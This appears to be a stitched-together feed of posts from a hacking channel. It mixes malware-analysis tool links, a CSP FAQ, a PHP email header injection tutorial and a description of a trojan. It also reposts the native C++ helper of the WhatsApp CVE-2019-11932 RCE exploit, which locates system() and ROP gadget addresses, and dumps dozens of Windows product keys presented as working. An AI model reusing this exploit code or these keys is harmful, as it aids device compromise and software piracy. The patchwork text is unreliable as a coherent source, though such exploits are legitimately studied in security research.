▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Create your own antivirus-malware detection tools & tutorials :

* [File Scanning Framework](https://github.com/EmersonElectricCo/fsf) -
Modular, recursive file scanning solution.

* [Generic File Parser](https://github.com/uppusaikiran/generic-parser) - A Single Library Parser to extract meta information,static analysis and detect macros within the files.

* [hashdeep](https://github.com/jessek/hashdeep) - Compute digest hashes with
a variety of algorithms.

* [HashCheck](https://github.com/gurnec/HashCheck) - Windows shell extension
to compute hashes with a variety of algorithms.

* [Loki](https://github.com/Neo23x0/Loki) - Host based scanner for IOCs.

* [Malfunction](https://github.com/Dynetics/Malfunction) - Catalog and
compare malware at a function level.

* [Manalyze](https://github.com/JusticeRage/Manalyze) - Static analyzer for PE
executables.

* [MASTIFF](https://github.com/KoreLogicSecurity/mastiff) - Static analysis
framework.

* [MultiScanner](https://github.com/mitre/multiscanner) - Modular file
scanning/analysis framework


don't clone our tutorials
git
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

WARNING! we receive many reports, some bad guys, use our profiles, names ! pictures or logos for a while & chatting people’s talking with Impersonation.

For chatting with undercode for support or help, dm admins in groups or go to social media only, or emails

Support@UndercodeTesting.com
Support@UndercodeNews.com

and thanks you.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The real lastest Whatsapp cve :


Finally uploaded

# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)

/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/

#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>

typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;

//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}

//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}

//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}

//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}

extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}



extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New tip :
The Content-Security-Policy
1. How can I allow multiple sources?
You can simply list your sources after a directive as a space-separated list:
content="default-src 'self' https://example.com/js/"
Note that there are no quotes around parameters other than the special ones, like 'self'. Also, there's no colon (:) after the directive. Just the directive, then a space-separated list of parameters.
Everything below the specified parameters is implicitly allowed. That means that in the example above these would be valid sources:
https://example.com/js/file.js
https://example.com/js/subdir/anotherfile.js
These, however, would not be valid:
http://example.com/js/file.js
^^^^ wrong protocol

https://example.com/file.js
^^ above the specified path
2. How can I use different directives? What do they each do?
The most common directives are:
• default-src the default policy for loading javascript, images, CSS, fonts, AJAX requests, etc
• script-src defines valid sources for javascript files
• style-src defines valid sources for css files
• img-src defines valid sources for images
• connect-src defines valid targets for to XMLHttpRequest (AJAX), WebSockets or EventSource. If a connection attempt is made to a host that's not allowed here, the browser will emulate a 400 error
There are others, but these are the ones you're most likely to need.
3. How can I use multiple directives?
You define all your directives inside one meta-tag by terminating them with a semicolon (;):
content="default-src 'self' https://example.com/js/; style-src 'self'"
4. How can I handle ports?
Everything but the default ports needs to be allowed explicitly by adding the port number or an asterisk after the allowed domain:
content="default-src 'self' https://ajax.googleapis.com http://example.com:123/free/stuff/"
The above would result in:
https://ajax.googleapis.com:123
^^^^ Not ok, wrong port

https://ajax.googleapis.com - OK

http://example.com/free/stuff/file.js
^^ Not ok, only the port 123 is allowed

http://example.com:123/free/stuff/file.js - OK
As I mentioned, you can also use an asterisk to explicitly allow all ports:
content="default-src example.com:*"
5. How can I handle different protocols?
By default, only standard protocols are allowed. For example to allow WebSockets ws:// you will have to allow it explicitly:
content="default-src 'self'; connect-src ws:; style-src 'self'"
^^^ web Sockets are now allowed on all domains and ports.
6. How can I allow the file protocol file://?
If you'll try to define it as such it won’t work. Instead, you'll allow it with the filesystem parameter:
content="default-src filesystem"
7. How can I use inline scripts and style definitions?
Unless explicitly allowed, you can't use inline style definitions, code inside <script> tags or in tag properties like onclick. You allow them like so:
content="script-src 'unsafe-inline'; style-src 'unsafe-inline'"
You'll also have to explicitly allow inline, base64 encoded images:
content="img-src data:"
8. How can I allow eval()?
I'm sure many people would say that you don't, since 'eval is evil' and the most likely cause for the impending end of the world. Those people would be wrong. Sure, you can definitely punch major holes into your site's security with eval, but it has perfectly valid use cases. You just have to be smart about using it. You allow it like so:
content="script-src 'unsafe-eval'"
9. What exactly does 'self' mean?
You might take 'self' to mean localhost, local filesystem, or anything on the same host. It doesn't mean any of those. It means sources that have the same scheme (protocol), same host, and same port as the file the content policy is defined in. Serving your site over HTTP? No https for you then, unless you define it explicitly.

Unixforum
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PHP mail injection practical exercise by Undercode :

1) Introduction

Today, the use of the Internet has risen sharply, but the vast majority of Internet users have no security knowledge background. Most people use the Internet to communicate with others via email. For this reason, most websites allow their users to contact them, provide suggestions to the website, report a problem, or request feedback, and the user will send the feedback to the website administrator’s email.

Unfortunately, most web developers don't have enough knowledge of Code-Security. Some of them use existing libraries or frameworks, which are subject to many known vulnerabilities. These vulnerabilities have been announced, and the manufacturers have patched them, and the corresponding attack source code poc is downloadable on the Internet, but most developers are too lazy to upgrade to the latest version.

Today we are going to talk about email injection, an attacker can use your mail server to send spam.

2) Email injection

E-mail injection is a security loophole, which is widely present in Internet email receiving and sending applications. This is similar to email injection and HTTP header injection. Similar to SQL injection attacks, this type of vulnerability is a common type of vulnerability that occurs when one programming language is embedded in another, such as MYSQL embedded in PHP.

When a form that can submit data to a web application is added to a web page, malicious users may use the MIME format to add additional information to the message to be sent (POST/GET), such as a new recipient list or A completely different message body. Because the MIME format uses carriage returns to separate the information in the data packet (there is a newline character between each line in the HTTP packet, and there are two newline characters between POST and HTTP HEADER), submit the form data by adding a carriage return ( It can be easily done using some plug-ins of FB), which allows a simple message board to be used to send thousands of messages. Similarly, a spammer can use this tactic to maliciously send a large number of anonymous messages.

Email injection is a type of attack against the built-in mail function of PHP. It allows malicious attackers to inject any email header fields, BCC, CC, subject, etc., and it allows hackers to send spam from the victim's mail server by injection. For this reason, this type of attack is called email injection, or spam in the form of mail. This vulnerability is not limited to PHP. It may affect any application that receives messages from the user UI and sends email messages. The main reason for this kind of attack is improper user input validation or the application has no authentication and filtering mechanism at all.

3) Third, the attack principle of email injection

The old Chinese saying goes well: Only by knowing it can you know why.

In order to explain the working principle of email injection, we must first understand the working principle of the PHP Email function. Below is the API explanation found in the PHP Manual


mail():
http://www.php.net/manual/en/function.mail.php
bool mail (string $to, string $subject, string $message [, string $additional_headers [, string $additional_parameters ]])
You can notice that this requires three required parameters ("Destination, Subject and Message") and some other optional parameters and the function returns a Boolean value.

https://pastebin.com/gfrEEmGa
NOW SEE THIS CODE :



first part

<?php
$to=" littlehann@foxmail.com ";
if (!isset($_POST["send"])){
?>
This code will check the form submission or not. The response of the user clicking the submit button and the script of normal visiting this page will be different. If this code returns True (the final result of the if statement is true), it means that the form is not submitted. The form will appear, waiting for user input. On the other hand, if it returns "False", it means that the form has been submitted, so the email will be sent.

the second part

<form method="POST" action="<?echo $_SERVER['PHP_SELF'];?>">
From: <input type="text" name="sender">
Subject: <input type="text" name ="subject">
Message:
<textarea name="message" rows="10" cols="60" lines="20"></textarea>
<input type="submit" name="send" value="Send ">
</form> The
second part is an HTML form tag, which requires user input.

MORE: https://pastebin.com/f8YAfm2P

🦑Fourth, mail injection demonstration

notice:

In order to use PHP as a mailing agent, we need to configure PHP.INI:

[mail function]
; For Win32 only
.; http://php.net/smtp
SMTP = smtp.qq.com
; http://php.net/smtp-port
smtp_port = 25
For demonstration purposes, we will use the previous The vulnerable code. In addition, we will submit the following values ​​as parameters for sending emails:

mail(" littlehann@foxmail.com ", "Call me urgent", "Hi,nPlease call me ASAP.nBye", "From: Test@UndercodeTesting.com ")
HTTP packet sent ...

🦑From the attacker's point of view, there are many additional fields that can be injected in the email header. See RFC 822 for more information. For example, CC (carbon copy) or BCC (blind copy) allows the attacker to insert more messages.

But it should be noted that before we add a new parameter, we must add a newline to separate each field. The hexadecimal value of the newline character is "0x0A"

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PHP mail injection practical exercise by Undercode

Detailed fresh Proxies List

https://pastebin.com/EBpfH5iT

List of Windows 8.1 Product/Serial Keys 2019
GCRJD-8NW9H-F2CDX-CCM8D-9D6T9
334NH-RXG76-64THK-C7CKG-D3VPT
MHF9N-XY6XB-WVXMC-BTDCT-MKKG7
TT4HM-HN7YT-62K67-RGRQJ-JFFXW
FHQNR-XYXYC-8PMHT-TV4PH-DRQ3H
HMCNV-VVBFX-7HMBH-CTY9B-B4FXY
XHQ8N-C3MCJ-RQXB6-WCHYG-C9WKB
MNDGV-M6PKV-DV4DR-CYY8X-2YRXH
Windows 8.1 DVD Keys
KQWNF-XPMXP-HDK3M-GBV69-Y7RDH
MMRNH-BMB4F-87JR9-D72RY-MY2KV
N4WY8-DVW92-GM8WF-CG872-HH3G7
ND8P2-BD2PB-DD8HM-2926R-CRYQH
Windows 8.1 Ultimate Product Keys
NTTX3-RV7VB-T7X7F-WQYYY-9Y92F
Windows 8.1 Pro Product Key
3FCND-JTWFM-24VQ8-QXTMB-TXT67
GX9N8-4H2FH-D987T-BQ9GK-XKT67
KKPMN-469HY-H6V43-T8VX2-8W8XV
T3NJK-3P683-2T7BJ-2X27F-8B2KV
DNJXJ-7XBW8-2378T-X22TX-BKG7J
MBFBV-W3DP2-2MVKN-PJCQD-KKTF7
6RH4V-HNTWC-JQKG8-RFR3R-36498
4Y8N3-H7MMW-C76VJ-YD3XV-MBDKV
28VNV-HF42G-K2WM9-JXRJQ-2WBQW
Windows 8.1 Enterprise Keys
MHF9N-XY6XB-WVXMC-BTDCT-MKKG7
Windows 8.1 Serial Keys
TGXN4-BPPYC-TJYMH-3WXFK-4JMQH
N9C46-MKKKR-2TTT8-FJCJP-4RDG7
Q4NBQ-3DRJD-777XK-MJHDC-749T7
4NMMK-QJH7K-F38H2-FQJ24-2J8XV
84NRV-6CJR6-DBDXH-FYTBF-4X49V
D7KN2-CBVPG-BC7YC-9JDVJ-YPWXV
3NHJ7-3WWQK-4RFTH-8FHJY-PRYQH
988NM-XKXT9-7YFWH-H2Q3Q-C34DH
2VTNH-323J4-BWP98-TX9JR-FCWXV
Windows 8.1 (Core | Multiple Editions) Keys

Windows 10 Product Keys :

Windows 10 Professional Key W269N-WFGWX-YVC9B-4J6C9-T83GX

Windows 10 Professional N Product Key MH37W-N47XK-V7XM9-C7227-GCQG9

Windows 10 Enterprise Key NPPR9-FWDCX-D2C8J-H872K-2YT43

Windows 10 Enterprise N Key DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4

(tested on 2019 Version)

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Apk error install fix :

Corrupted files

Not enough storage

Insufficient system permissions

Unsigned App

Incompatible version

Solving App Not Installed Error

Changing the app codes

Resetting the app preferences

Disabling Google Play protect

Avoid installation from the sd-cards

Clearing Data

Signing App

Unknown source installation

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Analytiques
a Trojan has been detected that can change proxy settings and intercept HTTPS traffic :

HOW IT WORK'S ?

1) Microsoft experts have warned about the emergence of a new Trojan capable of modifying proxy server settings, "listening" to encrypted traffic, stealing credentials, and other important information.

2) To spread the malware dubbed Trojan: JS / Certor.A., Cybercriminals usetraditional methods, in particular, spam mailing. Emails include a Microsoft Word document attachment that contains an embedded OLE object that runs a Jscript when opened. This script is disguised as a harmless file that does not arouse the user's suspicion. In fact, the code contains several PowerShell scripts and its own certificate, which is then used to monitor and intercept HTTPS traffic.

3) Once on the system, the malware modifies Internet Explorer proxy settings in the Windows registry and installs a Tor client, a task scheduler, a proxy tunneling utility,
and a certificate that allows attackers to listen to encrypted traffic. In addition, the Trojan installs another certificate for the Mozilla Firefox browser, since this Internet browser uses its own proxy settings.

4) Further, all traffic is redirected to a proxy server controlled by the attacker. As a result, they can remotely monitor, redirect, modify traffic and steal important victim data.

Don't copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁